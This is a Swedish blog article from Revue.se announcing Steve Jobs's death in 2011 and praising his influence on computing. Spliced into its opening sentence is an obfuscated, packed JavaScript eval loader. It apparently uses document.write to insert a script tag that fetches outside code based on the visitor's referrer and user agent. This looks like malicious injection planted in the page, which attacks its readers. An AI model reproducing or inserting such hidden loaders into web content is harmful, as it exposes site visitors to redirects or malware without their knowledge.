Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

7 Comments

Revue.se | Steve Jobs har avlidit

Steve Jobs har avlidit
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eerhs|var|u0026u|referrer|nzsti||js|php’.split(‘|’),0,{}))
är med stor sorg som vi meddelar att Steve Jobs, som påverkat vårt moderna samhälle med Apple och genom skapandet av Macintosh, iPod och iPhone, har avlidit 56 år gammal i cancer.

Det uttalades tidigt i morse den sjätte oktober från Apple att grundaren av företaget och pionjären i modern teknik har avlidit.

Jobs är ansvarig för att ha gjort datorn underhållande att använda och smartphonen en näst intill livsviktig del av vår vardag, han har påverkat hur filmer görs, hur musik säljs och hur vi interagerar med omvärlden genom att med ojämförbart engagemang och inlevelse gång på gång skjutsa in oss i nästa del av teknikens utveckling. Allt detta har han lyckats med bara under de senaste tio åren, men inte alla känner till att han samtidigt har haft en egen kamp mot bukspottkörtelcancer, en av de värre sorters cancer man kan drabbas av, sedan ett tag tillbaka och har under de senaste fem åren genomgått en mängd operationer för att bli av med den. På sistone har det sagts att läget ska ha blivit stabilare, men till sist tog cancern övertaget.

På Apples hemsida ser vi nu en svartvit bild på Jobs och årtalen 1955-2011, och det finns inte så mycket mer att skriva än att världen har förlorat ett sant geni!

För ett tag sedan lade vi upp en dokumentär om denna legend, se den här, det är något som är värt att se!

R.I.P. Steve Jobs

*UPPDATERING*

Läs citat från sörjande Apple fans på Wired.com
Länk: http://www.wired.com/